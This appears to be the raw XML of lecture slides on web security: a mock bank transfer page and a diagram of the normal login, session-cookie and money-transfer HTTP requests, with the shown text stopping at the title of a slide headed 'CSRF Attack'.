          <a:xfrm>
            <a:off x="982824" y="2313992"/>
            <a:ext cx="10493829" cy="40868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TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1101012" y="2444620"/>
            <a:ext cx="2867608" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Bank of Washington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63190">
            <a:off x="3790170" y="2479459"/>
            <a:ext cx="713405" cy="383125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rounded Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8758335" y="2477076"/>
            <a:ext cx="2438400" cy="377481"/>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867053" y="2477076"/>
            <a:ext cx="329682" cy="377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nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1776626" y="3217740"/>
          <a:ext cx="8776044" cy="492138"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{F5AB1C69-6EDB-4FF4-983F-18BD219EF322}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1462674">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="492138">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Account</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Transfer</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Invest</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Learn</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Locations</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="bg1">
                        <a:lumMod val="85000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Contact</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10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6625195" y="2477076"/>
            <a:ext cx="2024080" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Welcome, Christo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2751438" y="4110681"/>
            <a:ext cx="6936259" cy="21006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t>Transfer Money</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950361" y="4819908"/>
            <a:ext cx="1447468" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>To:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2950361" y="5443212"/>
            <a:ext cx="1447469" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amount:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4536158" y="4843345"/>
            <a:ext cx="2704397" cy="414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36157" y="5491285"/>
            <a:ext cx="2704397" cy="414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531113" y="5457457"/>
            <a:ext cx="1494160" cy="482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Transfer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2757608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6342" y="421423"/>
            <a:ext cx="2094335"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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9282589" y="418267"/>
            <a:ext cx="2094335"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="853391"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812374" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="9" name="Straight Arrow Connector 8"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812374" y="3745695"/>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81724" y="3387776"/>
              <a:ext cx="3200428" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /login_form.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="11" name="Group 10"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="1358803"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="5242791"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="14" name="Group 13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3429231" y="2502116"/>
            <a:ext cx="5250715" cy="381708"/>
            <a:chOff x="3812375" y="3387776"/>
            <a:chExt cx="5250715" cy="381708"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="15" name="Straight Arrow Connector 14"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812375" y="3745695"/>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45356" y="3387776"/>
              <a:ext cx="2673168" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>login.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t> HTTP/1.1</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Group 16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3259391" y="3034093"/>
            <a:ext cx="5541710" cy="684420"/>
            <a:chOff x="3611097" y="3340286"/>
            <a:chExt cx="5541710" cy="373249"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3732253" y="3713535"/>
              <a:ext cx="5291475"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11097" y="3340286"/>
              <a:ext cx="5541710" cy="352477"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.1 302 Found</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Set-Cookie: session=3#4fH8d%dA1; </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>HttpOnly</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>; Secure;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="20" name="Group 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3469991" y="4053512"/>
            <a:ext cx="5250715" cy="646332"/>
            <a:chOff x="3812377" y="3469443"/>
            <a:chExt cx="5250715" cy="279226"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="21" name="Straight Arrow Connector 20"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3812377" y="3745696"/>
              <a:ext cx="5250715" cy="2973"/>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42709" y="3469443"/>
              <a:ext cx="3278463" cy="279226"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>GET /money_xfer.html HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=3#4fH8d%dA1;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:gr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175" y="144897"/>
            <a:ext cx="1005227" cy="1005227"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Group 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3445648" y="4817103"/>
            <a:ext cx="5242791" cy="386817"/>
            <a:chOff x="3780935" y="3387776"/>
            <a:chExt cx="5242791" cy="386817"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="36" name="Straight Arrow Connector 35"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3780935" y="3774593"/>
              <a:ext cx="5242791"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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="38" name="Group 37"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3437724" y="5516677"/>
            <a:ext cx="5250715" cy="666960"/>
            <a:chOff x="3820299" y="3219826"/>
            <a:chExt cx="5250715" cy="666960"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="39" name="Straight Arrow Connector 38"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3820299" y="3862997"/>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790800" y="3219826"/>
              <a:ext cx="3182281" cy="646331"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>POST /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
                <a:t>xfer.php</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t> HTTP/1.1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>Cookie: session=3#4fH8d%dA1;</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="41" name="Group 40"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3364697" y="6303673"/>
            <a:ext cx="5291475" cy="369331"/>
            <a:chOff x="3715834" y="3387776"/>
            <a:chExt cx="5291475" cy="201415"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="42" name="Straight Arrow Connector 41"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3715834" y="3589191"/>
              <a:ext cx="5291475"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320571" y="3387776"/>
              <a:ext cx="2122761" cy="201415"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0"/>
                <a:t>HTTP/1.1 302 Found</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1768" y="256678"/>
            <a:ext cx="893446" cy="893446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Left Brace 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="2672709"/>
            <a:ext cx="329682" cy="1103079"/>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Left Brace 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="1069921"/>
            <a:ext cx="329682" cy="1107233"/>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Left Brace 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="5502149"/>
            <a:ext cx="329682" cy="121587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Left Brace 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2926702" y="4206027"/>
            <a:ext cx="329682" cy="104033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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122175" y="1269594"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GET the login page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122175" y="2562528"/>
            <a:ext cx="2516643" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>POST username and password, receive a session cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122174" y="4376678"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>GET the money transfer page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="122173" y="5756142"/>
            <a:ext cx="2555457" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicParenR" startAt="4"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>POST the money transfer request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05B51C97-74E1-4FBB-AA3E-F8A20B2D7B1B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6902482" y="3253155"/>
            <a:ext cx="1785957" cy="47684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2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up)">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4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up)">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500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="25" presetID="22" presetClass="entr" presetSubtype="2"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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up)">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par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="2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right)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="35"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="49" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="50" presetID="22" presetClass="entr" presetSubtype="1"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up)">
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="48"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="61" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="62" presetID="22" presetClass="entr" presetSubtype="2"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right)">
                                      <p:cBhvr>
                                        <p:cTn id="64" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="41"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="65" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="66" presetID="2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up)">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47"/>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up)">
                                      <p:cBhvr>
                                        <p:cTn id="7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p:bldP spid="50" grpId="0"/>
      <p:bldP spid="51" grpId="0"/>
      <p:bldP spid="52" grpId="0"/>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113"/>
            <a:ext cx="10515600" cy="1154112"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CSRF Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
